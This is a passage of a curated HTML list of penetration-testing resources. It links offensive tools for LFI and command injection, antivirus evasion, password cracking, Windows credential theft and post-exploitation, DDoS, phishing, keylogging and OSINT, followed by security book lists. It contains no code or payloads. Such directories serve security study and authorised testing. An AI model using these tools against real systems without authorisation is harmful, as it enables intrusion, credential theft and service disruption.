<li><a href="https://github.com/P0cL4bs/Kadimus">Kadimus</a>&nbsp;– LFI scan and exploit tool.</li>
<li><a href="https://github.com/hvqzao/liffy">liffy</a>&nbsp;– LFI exploitation tool.</li>
<li><a href="https://github.com/commixproject/commix">Commix</a>&nbsp;– Automated all-in-one operating system command injection and exploitation tool.</li>
<li><a href="https://github.com/kost/dvcs-ripper">DVCS Ripper</a>&nbsp;– Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR.</li>
<li><a href="https://github.com/internetwache/GitTools">GitTools</a> – One of the Hacking Tools that Automatically find and download Web-accessible&nbsp;<code>.git</code>&nbsp;repositories.</li>
<li><a href="https://www.thoughtcrime.org/software/sslstrip/" rel="nofollow">sslstrip</a>&nbsp;–<br />
One of the Hacking Tools Demonstration of the HTTPS stripping attacks.</li>
<li><a href="https://github.com/LeonardoNve/sslstrip2">sslstrip2</a>&nbsp;– SSLStrip version to defeat HSTS.</li>
<li><a href="http://nosqlmap.net/" rel="nofollow">NoSQLmap</a>&nbsp;– Automatic NoSQL injection and database takeover tool.</li>
<li><a href="https://github.com/codingo/VHostScan">VHostScan</a>&nbsp;– A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.</li>
<li><a href="https://github.com/fuzzdb-project/fuzzdb">FuzzDB</a>&nbsp;– Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.</li>
<li><a href="https://github.com/ChrisTruncer/EyeWitness">EyeWitness</a>&nbsp;– Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.</li>
<li><a href="https://github.com/maaaaz/webscreenshot">webscreenshot</a>&nbsp;– A simple script to take screenshots of list of websites.</li>
</ul>
<h3><a id="user-content-hex-editors" class="anchor" href="https://github.com/enaqx/awesome-pentest#hex-editors" aria-hidden="true"></a><strong>Hex Editors</strong></h3>
<ul>
<li><a href="https://hexed.it/" rel="nofollow">HexEdit.js</a>&nbsp;– Browser-based hex editing.</li>
<li><a href="https://hexinator.com/" rel="nofollow">Hexinator</a>&nbsp;– World’s finest (proprietary, commercial) Hex Editor.</li>
<li><a href="http://frhed.sourceforge.net/" rel="nofollow">Frhed</a>&nbsp;– Binary file editor for Windows.</li>
<li><a href="http://www.suavetech.com/0xed/0xed.html" rel="nofollow">0xED</a>&nbsp;– Native macOS hex editor that supports plug-ins to display custom data types.</li>
</ul>
<h3><a id="user-content-file-format-analysis-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#file-format-analysis-tools" aria-hidden="true"></a><strong>File Format Analysis Tools</strong></h3>
<ul>
<li><a href="http://kaitai.io/" rel="nofollow">Kaitai Struct</a>&nbsp;– File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.</li>
<li><a href="https://codisec.com/veles/" rel="nofollow">Veles</a>&nbsp;– Binary data visualization and analysis tool.</li>
<li><a href="http://hachoir3.readthedocs.io/" rel="nofollow">Hachoir</a>&nbsp;– Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.</li>
</ul>
<h3><a id="user-content-defense-evasion-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#defense-evasion-tools" aria-hidden="true"></a><strong>Defense Evasion Tools</strong></h3>
<ul>
<li><a href="https://www.veil-framework.com/" rel="nofollow">Veil</a>&nbsp;– Generate metasploit payloads that bypass common anti-virus solutions.</li>
<li><a href="https://github.com/Exploit-install/shellsploit-framework">shellsploit</a>&nbsp;– Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.</li>
<li><a href="http://nullsecurity.net/tools/binary.html" rel="nofollow">Hyperion</a>&nbsp;– Runtime encryptor for 32-bit portable executables (“PE&nbsp;<code>.exe</code>s”).</li>
<li><a href="https://github.com/govolution/avet">AntiVirus Evasion Tool (AVET)</a>&nbsp;– Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.</li>
<li><a href="https://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/" rel="nofollow">peCloak.py</a>&nbsp;– Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.</li>
<li><a href="https://github.com/v-p-b/peCloakCapstone">peCloakCapstone</a>&nbsp;– Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.</li>
<li><a href="https://github.com/Mr-Un1k0d3r/UniByAv">UniByAv</a>&nbsp;– Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.</li>
</ul>
<h3><a id="user-content-hash-cracking-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#hash-cracking-tools" aria-hidden="true"></a><strong>Hash Cracking Hacking Tools</strong></h3>
<ul>
<li><a href="http://www.openwall.com/john/" rel="nofollow">John the Ripper</a> – One of the best Hacking Tools for Fast password cracker.</li>
<li><a href="http://hashcat.net/hashcat/" rel="nofollow">Hashcat</a> – Another One of the Hacking Tools The more fast hash cracker.</li>
<li><a href="https://digi.ninja/projects/cewl.php" rel="nofollow">CeWL</a>&nbsp;– Generates custom wordlists by spidering a target’s website and collecting unique words.</li>
<li><a href="https://github.com/lmammino/jwt-cracker">JWT Cracker</a>&nbsp;– Simple HS256 JWT token brute force cracker.</li>
<li><a href="http://rarcrack.sourceforge.net/" rel="nofollow">Rar Crack</a>&nbsp;– RAR bruteforce cracker.</li>
<li><a href="https://github.com/glv2/bruteforce-wallet">BruteForce Wallet</a>&nbsp;– Find the password of an encrypted wallet file (i.e.&nbsp;<code>wallet.dat</code>).</li>
</ul>
<h3><a id="user-content-windows-utilities" class="anchor" href="https://github.com/enaqx/awesome-pentest#windows-utilities" aria-hidden="true"></a><strong>Windows Utilities</strong></h3>
<ul>
<li><a href="https://technet.microsoft.com/en-us/sysinternals/bb842062" rel="nofollow">Sysinternals Suite</a>&nbsp;– The Sysinternals Troubleshooting Utilities.</li>
<li><a href="http://www.ampliasecurity.com/research/windows-credentials-editor/" rel="nofollow">Windows Credentials Editor</a>&nbsp;– Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.</li>
<li><a href="http://blog.gentilkiwi.com/mimikatz" rel="nofollow">mimikatz</a>&nbsp;– Credentials extraction tool for Windows operating system.</li>
<li><a href="https://github.com/PowerShellMafia/PowerSploit">PowerSploit</a>&nbsp;– PowerShell Post-Exploitation Framework.</li>
<li><a href="https://github.com/GDSSecurity/Windows-Exploit-Suggester">Windows Exploit Suggester</a>&nbsp;– Detects potential missing patches on the target.</li>
<li><a href="https://github.com/SpiderLabs/Responder">Responder</a>&nbsp;– LLMNR, NBT-NS and MDNS poisoner.</li>
<li><a href="https://github.com/adaptivethreat/Bloodhound/wiki">Bloodhound</a>&nbsp;– Graphical Active Directory trust relationship explorer.</li>
<li><a href="https://www.powershellempire.com/" rel="nofollow">Empire</a>&nbsp;– Pure PowerShell post-exploitation agent.</li>
<li><a href="https://github.com/rabbitstack/fibratus">Fibratus</a>&nbsp;– Tool for exploration and tracing of the Windows kernel.</li>
<li><a href="https://labs.mwrinfosecurity.com/tools/wepwnise/" rel="nofollow">wePWNise</a>&nbsp;– Generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software.</li>
<li><a href="https://github.com/nccgroup/redsnarf">redsnarf</a>&nbsp;– Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.</li>
<li><a href="https://github.com/trustedsec/unicorn">Magic Unicorn</a>&nbsp;– Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or&nbsp;<code>certutil</code>&nbsp;(using fake certificates).</li>
<li><a href="https://github.com/byt3bl33d3r/DeathStar">DeathStar</a>&nbsp;– Python script that uses Empire’s RESTful API to automate gaining Domain Admin rights in Active Directory environments.</li>
</ul>
<h3><a id="user-content-gnulinux-utilities" class="anchor" href="https://github.com/enaqx/awesome-pentest#gnulinux-utilities" aria-hidden="true"></a><strong>GNU/Linux Utilities</strong></h3>
<ul>
<li><a href="https://github.com/PenturaLabs/Linux_Exploit_Suggester">Linux Exploit Suggester</a>&nbsp;– Heuristic reporting on potentially viable exploits for a given GNU/Linux system.</li>
</ul>
<h3><a id="user-content-macos-utilities" class="anchor" href="https://github.com/enaqx/awesome-pentest#macos-utilities" aria-hidden="true"></a><strong>macOS Utilities</strong></h3>
<ul>
<li><a href="https://github.com/Trietptm-on-Security/Bella">Bella</a>&nbsp;– Pure Python post-exploitation data mining and remote administration tool for macOS.</li>
</ul>
<h3><a id="user-content-ddos-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#ddos-tools" aria-hidden="true"></a><strong>DDoS Tools</strong></h3>
<ul>
<li><a href="https://github.com/NewEraCracker/LOIC/">LOIC</a>&nbsp;– Open source network stress tool for Windows.</li>
<li><a href="http://metacortexsecurity.com/tools/anon/LOIC/LOICv1.html" rel="nofollow">JS LOIC</a>&nbsp;– JavaScript in-browser version of LOIC.</li>
<li><a href="https://github.com/gkbrk/slowloris">SlowLoris</a>&nbsp;– DoS tool that uses low bandwidth on the attacking side.</li>
<li><a href="https://sourceforge.net/projects/high-orbit-ion-cannon/" rel="nofollow">HOIC</a>&nbsp;– Updated version of Low Orbit Ion Cannon, has ‘boosters’ to get around common counter measures.</li>
<li><a href="https://sourceforge.net/projects/t50/" rel="nofollow">T50</a>&nbsp;– Faster network stress tool.</li>
<li><a href="https://github.com/epsylon/ufonet">UFONet</a>&nbsp;– Abuses OSI layer 7 HTTP to create/manage ‘zombies’ and to conduct different attacks using;&nbsp;<code>GET</code>/<code>POST</code>, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.</li>
</ul>
<h3><a id="user-content-social-engineering-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#social-engineering-tools" aria-hidden="true"></a><strong>Social Engineering Tools</strong></h3>
<ul>
<li><a href="https://github.com/trustedsec/social-engineer-toolkit">Social Engineer Toolkit (SET)</a>&nbsp;– Open source pentesting framework designed for social engineering featuring a number of custom attack vectors to make believable attacks quickly.</li>
<li><a href="https://github.com/securestate/king-phisher">King Phisher</a> – One of the Hacking Tools for Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.</li>
<li><a href="https://github.com/kgretzky/evilginx">Evilginx</a>&nbsp;– MITM attack framework used for phishing credentials and session cookies from any Web service.</li>
<li><a href="https://github.com/sophron/wifiphisher">wifiphisher</a>&nbsp;– Automated phishing attacks against WiFi networks.</li>
<li><a href="https://github.com/ring0lab/catphish">Catphish</a>&nbsp;– Tool for phishing and corporate espionage written in Ruby.</li>
<li><a href="https://github.com/4w4k3/BeeLogger">Beelogger</a>&nbsp;– Tool for generating keylooger.</li>
</ul>
<h3><a id="user-content-osint-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#osint-tools" aria-hidden="true"></a><strong>OSINT Tools</strong></h3>
<ul>
<li><a href="http://www.paterva.com/web7/" rel="nofollow">Maltego</a> – One of the Hacking Tools and Proprietary software for open source intelligence and forensics, from Paterva.</li>
<li><a href="https://github.com/laramies/theHarvester">theHarvester</a>&nbsp;– E-mail, subdomain and people names harvester.</li>
<li><a href="https://github.com/ilektrojohn/creepy">creepy</a>&nbsp;– Geolocation OSINT tool.</li>
<li><a href="https://github.com/laramies/metagoofil">metagoofil</a>&nbsp;– Metadata harvester.</li>
<li><a href="https://www.exploit-db.com/google-hacking-database/" rel="nofollow">Google Hacking Database</a>&nbsp;– Database of Google dorks; can be used for recon.</li>
<li><a href="https://github.com/JohnTroony/Google-dorks">Google-dorks</a>&nbsp;– Common Google dorks and others you probably don’t know.</li>
<li><a href="https://github.com/k3170makan/GooDork">GooDork</a>&nbsp;– Command line Google dorking tool.</li>
<li><a href="https://github.com/jgor/dork-cli">dork-cli</a>&nbsp;– Command line Google dork tool.</li>
<li><a href="https://www.censys.io/" rel="nofollow">Censys</a>&nbsp;– Collects data on hosts and websites through daily ZMap and ZGrab scans.</li>
<li><a href="https://www.shodan.io/" rel="nofollow">Shodan</a>&nbsp;– World’s first search engine for Internet-connected devices.</li>
<li><a href="https://bitbucket.org/LaNMaSteR53/recon-ng" rel="nofollow">recon-ng</a> – One of the Hacking Tools Full-featured Web Reconnaissance framework written in Python.</li>
<li><a href="https://github.com/techgaun/github-dorks">github-dorks</a>&nbsp;– CLI tool to scan Github repos/organizations for potential sensitive information leak.</li>
<li><a href="https://github.com/melvinsh/vcsmap">vcsmap</a>&nbsp;– Plugin-based tool to scan public version control systems for sensitive information.</li>
<li><a href="http://www.spiderfoot.net/" rel="nofollow">Spiderfoot</a>&nbsp;– Multi-source OSINT automation tool with a Web UI and report visualizations</li>
<li><a href="https://github.com/Hood3dRob1n/BinGoo">BinGoo</a>&nbsp;– GNU/Linux bash based Bing and Google Dorking Tool.</li>
<li><a href="https://github.com/DanMcInerney/fast-recon">fast-recon</a>&nbsp;– Perform Google dorks against a domain.</li>
<li><a href="https://github.com/Smaash/snitch">snitch</a>&nbsp;– Information gathering via dorks.</li>
<li><a href="https://github.com/1N3/Sn1per">Sn1per</a> – ons of the Hacking Tools for Automated Pentest Recon Scanner.</li>
<li><a href="https://www.threatcrowd.org/" rel="nofollow">Threat Crowd</a>&nbsp;– Search engine for threats.</li>
<li><a href="https://www.virustotal.com/" rel="nofollow">Virus Total</a>&nbsp;– VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.</li>
<li><a href="https://github.com/upgoingstar/datasploit">DataSploit</a>&nbsp;– OSINT visualizer utilizing Shodan, Censys, Clearbit, EmailHunter, FullContact, and Zoomeye behind the scenes.</li>
<li><a href="https://github.com/michenriksen/aquatone">AQUATONE</a>&nbsp;– Subdomain discovery tool utilizing various open sources producing a report that can be used as input to other tools.</li>
<li><a href="http://intrigue.io/" rel="nofollow">Intrigue</a>&nbsp;– Automated OSINT &amp; Attack Surface discovery framework with powerful API, UI and CLI.</li>
<li><a href="https://www.zoomeye.org/" rel="nofollow">ZoomEye</a>&nbsp;– Search engine for cyberspace that lets the user find specific network components.</li>
</ul>
<h3><a id="user-content-anonymity-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#anonymity-tools" aria-hidden="true"></a><strong>Anonymity Tools</strong></h3>
<ul>
<li><a href="https://www.torproject.org/" rel="nofollow">Tor</a>&nbsp;– Free software and onion routed overlay network that helps you defend against traffic analysis.</li>
<li><a href="https://onionscan.org/" rel="nofollow">OnionScan</a> – One of the Hacking Tools for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.</li>
<li><a href="https://geti2p.net/" rel="nofollow">I2P</a>&nbsp;– The Invisible Internet Project.</li>
<li><a href="https://github.com/GouveaHeitor/nipe">Nipe</a>&nbsp;– Script to redirect all traffic from the machine to the Tor network.</li>
<li><a href="http://webkay.robinlinus.com/" rel="nofollow">What Every Browser Knows About You</a>&nbsp;– Comprehensive detection page to test your own Web browser’s configuration for privacy and identity leaks.</li>
</ul>
<h3><a id="user-content-reverse-engineering-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#reverse-engineering-tools" aria-hidden="true"></a><strong>Reverse Engineering Tools</strong></h3>
<ul>
<li><a href="https://www.hex-rays.com/products/ida/" rel="nofollow">Interactive Disassembler (IDA Pro)</a>&nbsp;– Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version,&nbsp;<a href="https://www.hex-rays.com/products/ida/support/download_freeware.shtml" rel="nofollow">IDA Free</a>.</li>
<li><a href="https://msdn.microsoft.com/en-us/windows/hardware/hh852365.aspx" rel="nofollow">WDK/WinDbg</a>&nbsp;– Windows Driver Kit and WinDbg.</li>
<li><a href="http://www.ollydbg.de/" rel="nofollow">OllyDbg</a>&nbsp;– x86 debugger for Windows binaries that emphasizes binary code analysis.</li>
<li><a href="http://rada.re/r/index.html" rel="nofollow">Radare2</a>&nbsp;– Open source, crossplatform reverse engineering framework.</li>
<li><a href="http://x64dbg.com/" rel="nofollow">x64dbg</a>&nbsp;– Open source x64/x32 debugger for windows.</li>
<li><a href="http://debugger.immunityinc.com/" rel="nofollow">Immunity Debugger</a>&nbsp;– Powerful way to write exploits and analyze malware.</li>
<li><a href="http://www.codef00.com/projects#debugger" rel="nofollow">Evan’s Debugger</a>&nbsp;– OllyDbg-like debugger for GNU/Linux.</li>
<li><a href="https://github.com/wisk/medusa">Medusa</a>&nbsp;– Open source, cross-platform interactive disassembler.</li>
<li><a href="https://github.com/joelpx/plasma">plasma</a>&nbsp;– Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.</li>
<li><a href="https://github.com/longld/peda">peda</a>&nbsp;– Python Exploit Development Assistance for GDB.</li>
<li><a href="https://github.com/0xd4d/dnSpy">dnSpy</a> – one of the Hacking Tools to reverse engineer .NET assemblies.</li>
<li><a href="https://github.com/devttys0/binwalk">binwalk</a>&nbsp;– Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.</li>
<li><a href="https://github.com/Cisco-Talos/pyrebox">PyREBox</a>&nbsp;– Python scriptable Reverse Engineering sandbox by Cisco-Talos.</li>
<li><a href="https://github.com/snare/voltron">Voltron</a>&nbsp;– Extensible debugger UI toolkit written in Python.</li>
<li><a href="http://www.capstone-engine.org/" rel="nofollow">Capstone</a>&nbsp;– Lightweight multi-platform, multi-architecture disassembly framework.</li>
<li><a href="https://github.com/fireeye/rVMI">rVMI</a>&nbsp;– Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.</li>
<li><a href="https://www.frida.re/" rel="nofollow">Frida</a>&nbsp;– Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.</li>
</ul>
<h3><a id="user-content-physical-access-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#physical-access-tools" aria-hidden="true"></a><strong>Physical Access Tools</strong></h3>
<ul>
<li><a href="https://lanturtle.com/" rel="nofollow">LAN Turtle</a>&nbsp;– Covert “USB Ethernet Adapter” that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.</li>
<li><a href="http://usbrubberducky.com/" rel="nofollow">USB Rubber Ducky</a>&nbsp;– Customizable keystroke injection attack platform masquerading as a USB thumbdrive.</li>
<li><a href="https://samy.pl/poisontap/" rel="nofollow">Poisontap</a>&nbsp;– Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.</li>
<li><a href="https://www.wifipineapple.com/" rel="nofollow">WiFi Pineapple</a>&nbsp;– Wireless auditing and penetration testing platform.</li>
<li><a href="https://proxmark3.com/" rel="nofollow">Proxmark3</a>&nbsp;– RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.</li>
</ul>
<h3><a id="user-content-side-channel-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#side-channel-tools" aria-hidden="true"></a><strong>Side-channel Tools</strong></h3>
<ul>
<li><a href="http://chipwhisperer.com/" rel="nofollow">ChipWhisperer</a>&nbsp;– Complete open-source toolchain for side-channel power analysis and glitching attacks.</li>
</ul>
<h3><a id="user-content-ctf-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#ctf-tools" aria-hidden="true"></a><strong>CTF Tools</strong></h3>
<ul>
<li><a href="https://github.com/zardus/ctf-tools">ctf-tools</a>&nbsp;– Collection of setup scripts to install various security research tools easily and quickly deployable to new machines.</li>
<li><a href="https://github.com/Gallopsled/pwntools">Pwntools</a>&nbsp;– Rapid exploit development framework built for use in CTFs.</li>
<li><a href="https://github.com/sourcekris/RsaCtfTool">RsaCtfTool</a>&nbsp;– Decrypt data enciphered using weak RSA keys, and recover private keys from public keys using a variety of automated attacks.</li>
</ul>
<h3><a id="user-content-penetration-testing-report-templates" class="anchor" href="https://github.com/enaqx/awesome-pentest#penetration-testing-report-templates" aria-hidden="true"></a><strong>Penetration Testing Report Templates</strong></h3>
<ul>
<li><a href="https://github.com/juliocesarfort/public-pentesting-reports">Public Pentesting Reports</a>&nbsp;– Curated list of public penetration test reports released by several consulting firms and academic security groups.</li>
<li><a href="https://www.testandverification.com/wp-content/uploads/template-penetration-testing-report-v03.pdf" rel="nofollow">Pentesting Report Template</a>&nbsp;– testandverification.com template.</li>
<li><a href="https://www.hitachi-systems-security.com/wp-content/uploads/Above-Security-Technical-Security-Audit-Demo-Report_En_FINAL.pdf" rel="nofollow">Pentesting Report Template</a>&nbsp;– hitachi-systems-security.com template.</li>
<li><a href="http://lucideus.com/pdf/stw.pdf" rel="nofollow">Pentesting Report Template</a>&nbsp;– lucideus.com template.</li>
<li><a href="https://www.crest-approved.org/wp-content/uploads/CREST-Penetration-Testing-Guide.pdf" rel="nofollow">Pentesting Report Template</a>&nbsp;– crest-approved.org templage.</li>
<li><a href="https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf" rel="nofollow">Pentesting Report Template</a>&nbsp;– pcisecuritystandards.org template.</li>
</ul>
<h2><a id="user-content-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#books" aria-hidden="true"></a><strong>Books</strong></h2>
<h3><a id="user-content-penetration-testing-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#penetration-testing-books" aria-hidden="true"></a><strong>Penetration Testing Books</strong></h3>
<ul>
<li><a href="https://www.nostarch.com/hacking2.htm" rel="nofollow">The Art of Exploitation by Jon Erickson, 2008</a></li>
<li><a href="https://www.nostarch.com/metasploit" rel="nofollow">Metasploit: The Penetration Tester’s Guide by David Kennedy et al., 2011</a></li>
<li><a href="https://www.nostarch.com/pentesting" rel="nofollow">Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014</a></li>
<li><a href="http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/" rel="nofollow">Rtfm: Red Team Field Manual by Ben Clark, 2014</a></li>
<li><a href="http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/" rel="nofollow">The Hacker Playbook by Peter Kim, 2014</a></li>
<li><a href="https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1" rel="nofollow">The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013</a></li>
<li><a href="https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4" rel="nofollow">Professional Penetration Testing by Thomas Wilhelm, 2013</a></li>
<li><a href="http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu" rel="nofollow">Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012</a></li>
<li><a href="https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6" rel="nofollow">Violent Python by TJ O’Connor, 2012</a></li>
<li><a href="http://www.fuzzing.org/" rel="nofollow">Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007</a></li>
<li><a href="http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900" rel="nofollow">Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014</a></li>
<li><a href="http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677" rel="nofollow">Penetration Testing: Procedures &amp; Methodologies by EC-Council, 2010</a></li>
<li><a href="http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE" rel="nofollow">Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010</a></li>
<li><a href="http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362" rel="nofollow">Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014</a></li>
<li><a href="https://www.nostarch.com/bughunter" rel="nofollow">Bug Hunter’s Diary by Tobias Klein, 2011</a></li>
<li><a href="https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/" rel="nofollow">Advanced Penetration Testing by <strong>Wil Allsopp, 2017</strong></a></li>
</ul>
<h3><strong><a id="user-content-hackers-handbook-series" class="anchor" href="https://github.com/enaqx/awesome-pentest#hackers-handbook-series" aria-hidden="true"></a>Hackers Handbook Series</strong></h3>
<ul>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html" rel="nofollow">The Database Hacker’s Handbook, David Litchfield et al., 2005</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html" rel="nofollow">The Shellcoders Handbook by Chris Anley et al., 2007</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html" rel="nofollow">The Mac Hacker’s Handbook by Charlie Miller &amp; Dino Dai Zovi, 2009</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html" rel="nofollow">The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html" rel="nofollow">iOS Hackers Handbook by Charlie Miller et al., 2012</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html" rel="nofollow">Android Hackers Handbook by Joshua J. Drake et al., 2014</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html" rel="nofollow">The Browser Hackers Handbook by Wade Alcorn et al., 2014</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html" rel="nofollow">The Mobile Application Hackers Handbook by Dominic Chell et al., 2015</a></li>
<li><a href="https://www.nostarch.com/carhacking" rel="nofollow">Car Hacker’s Handbook by Craig Smith, 2016</a></li>
</ul>
<h3><strong><a id="user-content-defensive-development" class="anchor" href="https://github.com/enaqx/awesome-pentest#defensive-development" aria-hidden="true"></a>Defensive Development</strong></h3>
<ul>
<li><a href="https://leanpub.com/holistic-infosec-for-web-developers" rel="nofollow">Holistic Info-Sec for Web Developers (Fascicle 0)</a></li>
<li><a href="https://leanpub.com/holistic-infosec-for-web-developers-fascicle1-vps-network-cloud-webapplications" rel="nofollow">Holistic Info-Sec for Web Developers (Fascicle 1)</a></li>
</ul>
<h3><a id="user-content-network-analysis-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#network-analysis-books" aria-hidden="true"></a><strong>Network Analysis Books</strong></h3>
<ul>
<li><a href="https://nmap.org/book/" rel="nofollow">Nmap Network Scanning by Gordon Fyodor Lyon, 2009</a></li>
<li><a href="https://www.nostarch.com/packet2.htm" rel="nofollow">Practical Packet Analysis by Chris Sanders, 2011</a></li>
<li><a href="https://www.amazon.com/Wireshark-Network-Analysis-Second-Certified/dp/1893939944" rel="nofollow">Wireshark Network Analysis by by Laura Chappell &amp; Gerald Combs, 2012</a></li>
<li><a href="http://www.amazon.com/Network-Forensics-Tracking-Hackers-Cyberspace-ebook/dp/B008CG8CYU/" rel="nofollow">Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff &amp; Jonathan Ham, 2012</a></li>
</ul>
<h3><a id="user-content-reverse-engineering-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#reverse-engineering-books" aria-hidden="true"></a><strong>Reverse Engineering Books</strong></h3>
<ul>
<li><a href="http://beginners.re/" rel="nofollow">Reverse Engineering for Beginners by Dennis Yurichev</a></li>
<li><a href="https://www.nostarch.com/xbox.htm" rel="nofollow">Hacking the Xbox by Andrew Huang, 2003</a></li>
<li><a href="https://www.nostarch.com/idapro2.htm" rel="nofollow">The IDA Pro Book by Chris Eagle, 2011</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118787315.html" rel="nofollow">Practical Reverse Engineering by Bruce Dang et al., 2014</a></li>
<li><a href="http://www.amazon.com/Hacking-Ethical-Hackers-Handbook-Edition/dp/0071832386" rel="nofollow">Gray Hat Hacking The Ethical Hacker’s Handbook by Daniel Regalado et al., 2015</a></li>
</ul>
<h3><a id="user-content-malware-analysis-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#malware-analysis-books" aria-hidden="true"></a><strong>Malware Analysis Books</strong></h3>
<ul>
<li><a href="https://www.nostarch.com/malware" rel="nofollow">Practical Malware Analysis by Michael Sikorski &amp; Andrew Honig, 2012</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118825098.html" rel="nofollow">The Art of Memory Forensics by Michael Hale Ligh et al., 2014</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470613033.html" rel="nofollow">Malware Analyst’s Cookbook and DVD by Michael Hale Ligh et al., 2010</a></li>
</ul>
<h3><a id="user-content-windows-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#windows-books" aria-hidden="true"></a><strong>Windows Books</strong></h3>
<ul>
<li><a href="http://www.amazon.com/Windows-Internals-Part-Developer-Reference/dp/0735648735/" rel="nofollow">Windows Internals by Mark Russinovich et al., 2012</a></li>
<li><a href="https://www.amazon.com/Troubleshooting-Windows-Sysinternals-Tools-2nd/dp/0735684448/" rel="nofollow">Troubleshooting with the Windows Sysinternals Tools by Mark Russinovich &amp; Aaron Margosis, 2016</a></li>
</ul>
<h3><a id="user-content-social-engineering-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#social-engineering-books" aria-hidden="true"></a><strong>Social Engineering Books</strong></h3>
<ul>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0471237124.html" rel="nofollow">The Art of Deception by Kevin D. Mitnick &amp; William L. Simon, 2002</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764569597.html" rel="nofollow">The Art of Intrusion by Kevin D. Mitnick &amp; William L. Simon, 2005</a></li>
<li><a href="http://www.hachettebookgroup.com/titles/kevin-mitnick/ghost-in-the-wires/9780316134477/" rel="nofollow">Ghost in the Wires by Kevin D. Mitnick &amp; William L. Simon, 2011</a></li>
